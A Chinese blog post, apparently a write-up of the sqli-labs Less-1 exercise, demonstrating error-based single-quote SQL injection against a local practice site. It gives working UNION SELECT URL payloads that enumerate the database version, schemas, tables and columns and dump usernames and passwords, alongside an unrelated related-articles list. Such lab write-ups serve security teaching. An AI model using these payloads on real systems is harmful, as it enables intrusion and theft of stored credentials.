首页 > 数据库 >sql-labs--Less-1--Error based-Single quotes

sql-labs--Less-1--Error based-Single quotes

时间:2023-09-04 17:02:53浏览次数:42  
标签:0.1 based Less -- image labs sqli id

sql\="SELECT \* FROM users WHERE id\='id' LIMIT 0,1"; 打开第一关,我们看到如下界面,上面写着Please input the ID as parameter with numeric value,它的意思是让我们请输入ID作为带有数值的参数。 https://images.cnblogs.com/cnblogs_com/blogs/800546/galleries/2341394/o_230904084633_image-20230903233859-2352t53.png 我们输入带有id的参数:http://127.0.0.1/sqli-labs/Less-1/?id=1,如下图,正确回显界面。 ![image](assets/image-20230903234125-nor3k75.png) 我们尝试加入and 1=1(http://127.0.0.1/sqli-labs/Less-1/?id=1 and 1=1),正确回显,然后我们将and 1=1 改为and 1=2,发现正确回显,为字符型注入,即说明存在闭合的干扰,所以我们在http://127.0.0.1/sqli-labs/Less-1/?id=1后面加一个'(单引号):http://127.0.0.1/sqli-labs/Less-1/?id=1',返回错误。如下图: 注释:这里and 1=1 改为and 1=2,发现正确回显,因为id为int类型,所以传入的 ‘1 and 1=2’ 会强制转换成 ‘1’ ,=>最终数据库中的查询语句为: select * from user where id ='1'; 所以sql语句不会报错。 ![image](assets/image-20230904070755-4puotz3.png) 爆的SQL语法错误('1'' LIMIT 0,1),多加了一个引号,即为字符型注入,说明为id='id'。 我们对‘后加--+进行注释。不能用# ,因为url中的# 号代表html页面中的锚点,数据传输过程并不会一起带到后端,且命令传到后端,少了一个单引号用来闭合命令(我们可以利用这种特性,在url中命令结尾添加一个单引号来代替注释符,或者将# 改为url编码(%23)。 然后我们使用order by对数据进行排序,查看数据有几列。(http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--+)超过3就会报错,显示结果超出。如下: ![image](assets/image-20230904105415-zm5rsps.png) 然后进行union联合注入(union 的作用是将两个 sql 语句进行联合。):当 id 的数据在数据库中不存在时,(即使 id=-1,两个 sql 语句进行联合操作时,当前一个语句选择的内容为空,就将后面的语句的内容显示出来)此处前台页面返回了构造的 union 的数据。 http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3--+,回显正确。如下: ![image](assets/image-20230904112405-o0flsqh.png) 我们可以看出是更改select中的2,3来使我们知道我们想知道的信息。 查询数据库版本和数据库名:http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,version(),database()--+ ![image](assets/image-20230904112921-04boptb.png) 查询用户名和操作系统:http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,user(),@@version_compile_os--+ ![image](assets/image-20230904113047-e0oinbv.png) 也可以爆出数据库中的所有数据库名(http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+),我上边已经将这个数据库的库名爆出来了,没必要再去爆所有数据库名。 爆出security 数据库的数据表:http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ ![image](assets/image-20230904114212-t8b9ybv.png) 爆users表:http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ ![image](assets/image-20230904114445-awpt6i8.png) 爆出数据:http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,username,password from users where id=1--+ ![image](assets/image-20230904114638-44f3ipx.png)

标签:0.1,based,Less,--,image,labs,sqli,id
From: https://www.cnblogs.com/weljoni/p/17677539.html

相关文章

  • InstallShield X制作安装程序杂记(5.System Configuration节点)
    1.Shortcuts(快捷方式):快捷方式主要是以下几个地方:StartMenu(开始菜单)/ProgramsMenu(程序菜单)/Startup(启动)/Desktop(桌面)   (1)StartMenu,如果你装了UtraEdit就知道了,点击开始菜单,在上方就可以看到,这是比较cool的一种方式,堪称最快捷。而且很多软件都不往那里装,比较显眼,好......
  • 软件开发原子化 技术转型加速器
    在万物互联的时代,人均持有设备量不断攀升,设备和场景的多样性,每个设备都需要独立开发一个应用,先安装后使用、不同设备的能力不兼容等传统应用的短板逐步暴露出来。在此背景下,应用提供方和用户都迫切需要一种新的服务提供方式,使应用开发更简单、服务的获取和使用更便捷,原子化服务也就......
  • Python-Virtualenv虚拟环境
    一.为何需要之前我们安装python第三方库时,都是直接通过pipinstallxx的方式进行安装的,这样会使第三方库直接安装到Python系统环境中,同时默认安装的都是最新版本的第三方库 这样安装会存在一个问题:如果用Django1.10.x开发了一个网站,同时有一个用Django0.9开发的旧项目需要......
  • InstallShield X制作安装程序杂记(4.Application Data节点)
    1.FilesandFolders(文件与文件夹):这个一看就明白,有四个区域Sourcecomputer'sfolders(源机器文件夹,即制作安装程序的机器中的文件夹),SourceComputer'sfiles(源文件,列出源文件夹中的文件)Destinationcomputer'sfolders(目标机器文件夹,即要安装的机器上的文件夹),Destinationcompu......
  • Xcode,swift:Error Domain=kCLErrorDomain Code=1 "(null)"问题解决
    问题描述:iOS开发时,当使用用户的位置权限时,获取用户经纬度报错:ErrorDomain=kCLErrorDomainCode=1"(null)",错误域=kCLError域代码=1“(null)”解决方法:打开模拟机的设置-通用-语言与地区将地区设置为中国(如果你的开发位置在中国的话) 点击左上方Features,选择Locati......
  • Web Service Tip: JSPs Calling Web Services
    WebServiceTip:JSPsCallingWebServicesHowdoIcallaWebservicefromaJSP? Seemslikeasimplequestionbutitturnsouttherearemanyways-somequickanddirtyandothersmorecorrect. Let'snotdebatecorrectness(doyoureallywantto......
  • Windows python版本管理工具pyenv
    windows下的python多环境pyenv-win搭建安装pyenv-win在PowerShell中安装建议使用管理员身份打开PowerShellInvoke-WebRequest-UseBasicParsing-Uri"https://raw.githubusercontent.com/pyenv-win/pyenv-win/master/pyenv-win/install-pyenv-win.ps1"-OutFile"./insta......
  • 漫云智播直播无人直播app软件
      漫云智播软件,是一款以商家无人直播为主的软件系统,不管是是否会带货,是否有直播经验,只要把相关用户关系的问题,产品的问题前部录入系统就能实现,自动无人带货了,漫云智播能实现用户直播的所有问题。  漫云智播软件,采用的是高质量的文字识别技术,按照文字的内容识别出相关的客......
  • ClickHouse一些调优的小技巧【持续更新】
     ClickHouse一些调优的小技巧 Q1:调试SQL时如何不返回数据结果?结尾适用formatNull即可,如:select*fromtable_namewhereid=1formatNull; Q2:默认情况下执行SQL都是尽可能的多线程以尽量使用资源,如何单线程执行SQL?由参数max_threads控制,如:select*fromtable_name......
  • AMEYA详解:上海雷卯常用防反接保护电路及功耗计算
    采用电池是最方便干净的电源,为电子电路提供电压。还有许多其他方法,为电子设备供电,如适配器,太阳能电池等,但最常见的直流电源是电池。通常,所有设备都带有防反接保护电路,但是如果您有任何电池供电的设备没有防反接保护,那么在更换电池时始终必须小心,否则它可能会炸毁设备。因此,在这......